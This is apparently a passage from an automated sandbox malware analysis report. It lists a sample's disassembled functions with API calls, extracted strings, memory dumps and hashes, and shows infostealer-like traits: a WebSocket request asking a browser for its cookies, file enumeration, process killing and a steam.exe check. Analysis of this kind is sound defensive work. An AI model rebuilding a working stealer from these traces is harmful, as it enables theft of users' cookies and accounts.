                        • lstrcat.KERNEL32(?,?), ref: 0045D642
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045D682
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045D6D2
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045D737
                        • FindClose.KERNEL32(00000000), ref: 0045D746
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 50252434-4073750446
                        • Opcode ID: 025037dca0598d915d2c46cfddcd54881c39678cbbf8d3856a48e9b76eecc7e5
                        • Instruction ID: 3668b14af6b003abf29ccf82cd466c2a177c03c4a196d97a274a714c52217588
                        • Opcode Fuzzy Hash: 025037dca0598d915d2c46cfddcd54881c39678cbbf8d3856a48e9b76eecc7e5
                        • Instruction Fuzzy Hash: F56195719101199BDB24EF74DC88ADEB7B5AF48305F0084A9F909A3351DB38AA84CFA4
                        Function 004648B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                        • API String ID: 909987262-758292691
                        • Opcode ID: 49dd3b3ea9483b2732a2beeac070febc720aad5a06edde20691539b4b15b4db1
                        • Instruction ID: dd65c41c464298faf40e24bf2483483b37b49f67cbc5c7275401145b0dacf75e
                        • Opcode Fuzzy Hash: 49dd3b3ea9483b2732a2beeac070febc720aad5a06edde20691539b4b15b4db1
                        • Instruction Fuzzy Hash: 24A26970D012599FDF20DFA8C9807EDBBB6AF89304F1481AAD508A7341EB785E85CF95
                        Function 004523A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004523D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004523F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452402
                        • lstrlen.KERNEL32(\*.*), ref: 0045240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00452436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00452486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 07dc86d98fef2fd3f0d2c516709103f943e1cd855afde971bd245e2c2c44122d
                        • Instruction ID: 31b1713678d08ae30cccdf4526df538c45655d3c80e7c5e73fa6413df4cc0e8b
                        • Opcode Fuzzy Hash: 07dc86d98fef2fd3f0d2c516709103f943e1cd855afde971bd245e2c2c44122d
                        • Instruction Fuzzy Hash: 4E4195317102059BDB31FF25DE85A9FB7A5AF15309F40512BFC49A7322CBB89C458BA8
                        Function 004646A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004646B9
                        • Process32First.KERNEL32(00000000,00000128), ref: 004646C9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 004646DB
                        • StrCmpCA.SHLWAPI(?,?), ref: 004646ED
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464702
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00464711
                        • CloseHandle.KERNEL32(00000000), ref: 00464718
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00464726
                        • CloseHandle.KERNEL32(00000000), ref: 00464731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 6d7f1dcb1fdd15ad271bf1bf391bad682eb88258839640b9ae873c0083e976da
                        • Instruction ID: 1615484cd67d504cb4dfce18e5696c8c0572e381410346406eecbeaf6a369e0a
                        • Opcode Fuzzy Hash: 6d7f1dcb1fdd15ad271bf1bf391bad682eb88258839640b9ae873c0083e976da
                        • Instruction Fuzzy Hash: 1B01A131611114ABEB255B60DC8CFFB37BDAB85B51F041199F90992180EF789D808A75
                        Function 00804ACF Relevance: 12.9, Strings: 9, Instructions: 1618COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (+}z$JHk$QhL$\`w$k_{.$rbXk$sEG{$|?]$A;
                        • API String ID: 0-1580587299
                        • Opcode ID: 2984d76719618c611581c2d92288a986b85d038fadab823062c60397515671b1
                        • Instruction ID: aede0d9fae2de8e3d5d2726e0eb417b2e356877e8954e2dd0b33f8ed13b6d016
                        • Opcode Fuzzy Hash: 2984d76719618c611581c2d92288a986b85d038fadab823062c60397515671b1
                        • Instruction Fuzzy Hash: BBB218F3A0C2009FE308AE2DDC8567AFBE9EF94720F1A453DE6C587744EA3558058697
                        Function 00464610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00464628
                        • Process32First.KERNEL32(00000000,00000128), ref: 00464638
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0046464A
                        • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00464660
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00464672
                        • CloseHandle.KERNEL32(00000000), ref: 0046467D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                        • String ID: steam.exe
                        • API String ID: 2284531361-2826358650
                        • Opcode ID: 33ce8ef03c1ed421144a58ac81df9ce6d3dd98b0ec6bf43b9812f1574947763d
                        • Instruction ID: 56d5960c80cd642f8c71b975199415d95c4f03a6124c0ca172135ef0533ea0be
                        • Opcode Fuzzy Hash: 33ce8ef03c1ed421144a58ac81df9ce6d3dd98b0ec6bf43b9812f1574947763d
                        • Instruction Fuzzy Hash: B6018F716011249BDB209B70EC48FEB77ADEB49350F0001DAE90DD2140EBB889948AE5
                        Function 00454B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454B7F
                        • lstrlen.KERNEL32(00474CA8), ref: 00454B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BA7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 00454BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00454BFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID:
                        • API String ID: 2567437900-0
                        • Opcode ID: 976922cba01cb0031d9c5a27596fc65e0bc36f4382cc3c11fb9f2a0cec565086
                        • Instruction ID: 2fc248bcc17de3ff8d4b9e52b3aab27a06e8a9d32546598f83a6a75f55e77978
                        • Opcode Fuzzy Hash: 976922cba01cb0031d9c5a27596fc65e0bc36f4382cc3c11fb9f2a0cec565086
                        • Instruction Fuzzy Hash: 003197312111059BD722EF25DD85A9FB7B5AF80319F40112AFC099B352CB78ED458BA8
                        Function 00462D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00462D9B
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00462DAD
                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00462DBA
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00462DEC
                        • LocalFree.KERNEL32(00000000), ref: 00462FCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: f9c2ad78fdabe956875cc1bd1714371f88f2bf18e0c866eea6ef69fc720493c5
                        • Instruction ID: e9f746b1d6cfd464eb95bec35ad2d2ddf7e659aeb66acf9e2e78ec32d7aafda5
                        • Opcode Fuzzy Hash: f9c2ad78fdabe956875cc1bd1714371f88f2bf18e0c866eea6ef69fc720493c5
                        • Instruction Fuzzy Hash: 1BB12E70900615DFC718CF14CA48B96B7F2FB44329F29C1AAD4085B3A5E7BA9D82CF95
                        Function 008066C3 Relevance: 10.4, Strings: 7, Instructions: 1651COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Brw$Q.[b$XE$i k$jt=$u3y$z6~+
                        • API String ID: 0-3060621466
                        • Opcode ID: 90fca21d0a5872a54e7ea86d9a200738930da4cd07003a391d0794b3e5d6b14e
                        • Instruction ID: 9a9dc94020a315361a3efe95964128cf0c10be4e32a3bf67494b1d1f7535af8c
                        • Opcode Fuzzy Hash: 90fca21d0a5872a54e7ea86d9a200738930da4cd07003a391d0794b3e5d6b14e
                        • Instruction Fuzzy Hash: 65B239F3A0C6009FE308AE2DEC8567AFBEAEFD4620F1A853DE5C5C3744E93558058656
                        Function 007FB2F4 Relevance: 9.8, Strings: 7, Instructions: 1032COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5O_$1{$;d;$V\^$Z:~?$bp5~$v=7
                        • API String ID: 0-4034966862
                        • Opcode ID: b6b9050ec3a89621ad13c03419e01f4b192e7c7c4498d033588ce37d97cdf242
                        • Instruction ID: 413107da9ea36e7b63cec75ec54f714d4d1fc0f5d40aa76b34f70f5fd9abf351
                        • Opcode Fuzzy Hash: b6b9050ec3a89621ad13c03419e01f4b192e7c7c4498d033588ce37d97cdf242
